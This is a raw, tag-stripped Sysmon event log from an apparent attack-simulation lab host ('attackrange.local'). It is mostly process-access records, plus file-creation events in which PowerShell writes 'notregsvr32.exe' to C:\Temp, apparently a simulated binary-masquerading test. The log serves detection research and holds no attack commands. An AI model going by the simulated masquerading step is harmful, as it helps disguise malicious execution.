22:13:27.616{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361309Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.616{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361308Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.616{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361307Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.616{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3707-6013-af03-000000001100}8612C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361306Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.616{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3707-6013-af03-000000001100}8612C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4179|UNKNOWN(00007FFC8EDAE154) 154100x8000000000000000361305Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.628{8e433fbf-3707-6013-af03-000000001100}8612C:\Windows\System32\HOSTNAME.EXE10.0.18362.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=612DBA11F1DFAD1998609A647B740B34,SHA256=F88F37BFEFFC80D563B87AD6DE0F65D52D5760882013ABA5ECBE9FAD08D36777,IMPHASH=5CD891320C666621E9783444DB8CBA78{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x8000000000000000361304Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.616{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Temp\RegSvr32.txt2021-01-28 22:13:27.616 11241100x8000000000000000361303Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.localEXE2021-01-28 22:13:27.616{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Temp\notregsvr32.exe2021-01-28 22:13:27.616 10341000x8000000000000000361302Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.100{8e433fbf-337b-6013-8902-000000001100}62443632C:\Windows\system32\svchost.exe{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1ed62|c:\windows\system32\cbdhsvc.dll+1e9c6|c:\windows\system32\cbdhsvc.dll+1e61e|c:\windows\system32\cbdhsvc.dll+1e50b|c:\windows\system32\cbdhsvc.dll+1f02a|c:\windows\system32\cbdhsvc.dll+408cd|c:\windows\system32\cbdhsvc.dll+43915|c:\windows\system32\cbdhsvc.dll+6b9ad|c:\windows\system32\cbdhsvc.dll+6a338|c:\windows\system32\CoreUIComponents.dll+113c0d|c:\windows\system32\CoreUIComponents.dll+313fa|c:\windows\system32\CoreUIComponents.dll+31202|c:\windows\system32\CoreUIComponents.dll+5b84f|c:\windows\system32\CoreUIComponents.dll+3812a|C:\Windows\System32\CoreMessaging.dll+dd76|C:\Windows\System32\CoreMessaging.dll+3b119|C:\Windows\System32\CoreMessaging.dll+185c5|C:\Windows\System32\CoreMessaging.dll+18386|C:\Windows\System32\CoreMessaging.dll+17da3|C:\Windows\System32\CoreMessaging.dll+17c8c|C:\Windows\System32\CoreMessaging.dll+37da5|C:\Windows\System32\CoreMessaging.dll+37a4f 10341000x8000000000000000361301Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.100{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8902-000000001100}6244C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+32810|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361300Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.100{8e433fbf-337b-6013-8902-000000001100}62445776C:\Windows\system32\svchost.exe{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+1c4d6|C:\Windows\System32\appresolver.dll+22383|C:\Windows\System32\appresolver.dll+1edcc|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361299Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.100{8e433fbf-337b-6013-8902-000000001100}62445776C:\Windows\system32\svchost.exe{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+221c5|C:\Windows\System32\appresolver.dll+1edcc|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361298Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.100{8e433fbf-337b-6013-8902-000000001100}62445776C:\Windows\system32\svchost.exe{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1fb9d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361297Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.100{8e433fbf-337b-6013-8902-000000001100}62443632C:\Windows\system32\svchost.exe{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+b4a80|c:\windows\system32\cbdhsvc.dll+1e838|c:\windows\system32\cbdhsvc.dll+1e405|c:\windows\system32\cbdhsvc.dll+1f02a|c:\windows\system32\cbdhsvc.dll+408cd|c:\windows\system32\cbdhsvc.dll+43915|c:\windows\system32\cbdhsvc.dll+6b9ad|c:\windows\system32\cbdhsvc.dll+6a338|c:\windows\system32\CoreUIComponents.dll+113c0d|c:\windows\system32\CoreUIComponents.dll+313fa|c:\windows\system32\CoreUIComponents.dll+31202|c:\windows\system32\CoreUIComponents.dll+5b84f|c:\windows\system32\CoreUIComponents.dll+3812a|C:\Windows\System32\CoreMessaging.dll+dd76|C:\Windows\System32\CoreMessaging.dll+3b119|C:\Windows\System32\CoreMessaging.dll+185c5|C:\Windows\System32\CoreMessaging.dll+18386|C:\Windows\System32\CoreMessaging.dll+17da3|C:\Windows\System32\CoreMessaging.dll+17c8c|C:\Windows\System32\CoreMessaging.dll+37da5|C:\Windows\System32\CoreMessaging.dll+37a4f|C:\Windows\System32\CoreMessaging.dll+14f90 10341000x8000000000000000362379Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362378Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362377Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362376Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362375Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362374Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362373Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362372Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362371Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362370Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.882{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362369Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.866{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362368Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.866{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362367Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.866{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362366Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.866{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 